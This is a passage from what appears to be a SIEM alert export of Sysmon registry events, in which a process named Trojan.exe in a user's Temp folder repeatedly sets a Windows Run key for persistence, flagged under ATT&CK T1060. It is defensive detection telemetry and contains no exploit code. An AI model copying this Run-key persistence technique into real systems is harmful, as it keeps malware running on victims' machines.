HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:51.220015900Z"",""eventRecordID"":""1431"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:51.210\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:51.210"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:03.339",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:50.205 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:50.210720100Z"",""eventRecordID"":""1430"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:50.205\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:50.205"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:02.317",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:49.190 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:49.197108700Z"",""eventRecordID"":""1429"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:49.190\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:49.190"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:01.301",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:48.174 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:48.174903400Z"",""eventRecordID"":""1428"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:48.174\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:48.174"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:00.285",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:47.158 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:47.160381200Z"",""eventRecordID"":""1427"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:47.158\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:47.158"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:59.270",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:46.142 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:46.151307400Z"",""eventRecordID"":""1426"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:46.142\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:46.142"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:58.238",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:45.127 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:45.128983100Z"",""eventRecordID"":""1425"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:45.127\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:45.127"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:57.223",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:44.111 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:44.116528700Z"",""eventRecordID"":""1423"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:44.111\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:44.111"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:56.209",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:43.095 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:43.099824800Z"",""eventRecordID"":""1422"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:43.095\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:43.095"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:55.192",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:42.080 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:42.083683300Z"",""eventRecordID"":""1421"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:42.080\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:42.080"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:54.192",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:41.065 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:41.066677800Z"",""eventRecordID"":""1420"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:41.065\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:41.065"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:53.178",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:40.049 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: 